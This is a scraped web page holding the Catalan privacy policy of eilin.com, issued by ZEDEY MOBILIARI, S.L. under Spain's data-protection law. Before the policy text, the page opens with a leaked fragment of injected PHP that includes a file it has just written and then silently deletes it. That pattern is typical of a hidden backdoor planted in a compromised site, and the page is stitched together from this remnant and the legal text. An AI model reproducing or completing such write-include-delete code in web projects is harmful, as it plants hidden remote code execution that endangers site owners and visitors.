");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> eilin.com | Política de privadesa

Política de privadesa

De conformitat amb el que estableix la Llei Orgànica 15/1999 de Protecció de Dades de Caràcter Personal (LOPD), ZEDEY MOBILIARI,S.L. informa als usuaris del seu lloc web que les dades personals recollides per ZEDEY MOBILIARI,S.L. , mitjançant el formulari situat a la seva pàgina, seran inclosos en un fitxer automatitzat sota la responsabilitat de ZEDEY MOBILIARI,S.L. , amb la finalitat de poder facilitar, agilitzar i complir els compromisos establerts entre ambdues parts.
Així mateix, ZEDEY MOBILIARI,S.L.  informa de la possibilitat d’exercir els drets d’accés, rectificació, cancel·lació i oposició mitjançant un escrit a l’adreça: C/ Calderón de la Barca, 1 08940 Cornellà de Llobregat (Barcelona).
Mentre l’usuari no comuniqui el contrari a ZEDEY MOBILIARI,S.L. , aquesta entendrà que les seves dades no han estat modificades, que l’usuari es compromet a notificar qualsevol variació i que ZEDEY MOBILIARI,S.L.  té el consentiment per utilitzar-les a fi de poder fidelitzar la relació entre les parts.